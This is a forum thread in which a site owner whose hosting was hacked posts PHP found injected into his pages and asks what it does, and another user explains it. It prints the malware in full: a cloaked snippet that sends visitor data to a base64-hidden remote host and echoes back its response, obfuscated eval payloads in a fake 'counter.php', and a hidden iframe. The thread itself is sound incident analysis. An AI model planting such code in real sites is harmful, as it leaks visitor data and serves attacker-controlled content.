Just a question about a code

[mariocesar]

Please if any body can tell me what is this code about :

 
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>

Thanks a lot.

[jeapie]

Seems like it;'s statisctic module.

 

In first part it checks that user is not bot (google bot, yahoo bot or other crawlers). If it's bot - it does nothing.

 

Then if it's real user with browser - it inits http request to remote URL  base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw') ,which is actually equals to http://mbrowserstats.com/statH/stat.php (you can check it out by online base 64 decoders)

 

And it sends arguments there (ip adress, useragent (browser), domain name and others).

 

So with that script this remote site http://mbrowserstats.com gets statistic.
And as you see they encoded their URL with base_64 which usually means that this is a malware.

[mariocesar]

Thanks Jeapie, some body hack into my hosting files, and add that code to a certain number of pages, pluss I found this file named counter.php,

<?php
//Counter V.1.25
//Generated by server
//Do not delete
eval(gzuncompress(base64_decode('eAGlklFrgzAUhf9KHwZpoRSpW0GGD+6hllEY2tIayxCNUrCRjQoF++uXc6Pdg9GXviTx5jvn3Fx88bdfH952d2JJWifs2/Wu17SZZmldrF6TvBA/eTFlgk0WzA4bbDkW36kzqlFFirPrstl8QKXVIJVDn7JDXDWPDBNByaIljR4dYUzQ2SMJAGyidC/6bPIiMuy6Jdrcz3AaryBb37HGe25FS5qA5EvnEgcuyoZp5tFnHR/fSpp7q+gnEwUHkM9S8EHqv5/sJ3L70GRr55f6qqTVJyBvKRzvcUTvveFDbAJshvdy1JU3NuWvVDiFN5rrBuchJe46tVLKwj+UY12Bd/RcfZUT4F+evf8BaXnbUA=='))); ?><? eval(gzuncompress(base64_decode('eAGFlI1vmkAYxv8VNAa41BgEu60xZHPrFWsQ2hM2O0PI8aGQItcIbGmN//vuKNIpJoQEcuT3vPfxPO/Fa7ETZ1mYi70scyUA9puEeDjhyuG4fKs7UqSBKF1JA/n67AVKZKj2NN38PtEXK8HFmSs4K8kRe+4Cop8QrYSpZT24Nh25Ew0aluC8y2TVsHW9rKCo3e44Xotio9CQFqJLG/aFDSGbJBSAqnJrnGQh4PkmLtf4K44IaaGVmvZwHBQt9Kimt1nawl7XrB/tyLZt2Z9q3IvTTUvtzzWc4TXexS34lxr3SH7CnjmE4B1EEAlOh7oB9tSOKhq1kQjOTQu6k9tbSjEj8l0RcjzPnYOl41NzwbyuMLBnPirNqNw4ooCnSPJvyR9dDjJPnkWeNnv1lODt93L2Fmh3El4aEv41L57km1xXDOlpiebv38fC16K/AuAGwtf4RRW4QTNCJ2E83QOV8UUW7vAmTPPL6mMC2RR8QLY4TlO8DS/DLH/1cf1/Cky8LpLkBefRZSkLYy1F8NGGC8u10T09Qib2o9B/ZsrjWWvQWgkJIc8f/dTcepVZBYwPB2oos0DmOtQS1nrUkvO+HVbBlfs/bKSbD5aLoGUjw0ITY0Hj0T9eBkNAm7ihrnL8obbu59C0rVomX9GHSelCRuq3ZoUq3DJg10FJraopgaOqXZMG8/xvl+uOQz8i5aU1Gh+aRasWoEUPh38973Nd'))); ?>

and they post this line at the botom of some pages:

<iframe src="http://www.xxxxxxxxxx.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

I allready started updating files,

[mariocesar]

Thanks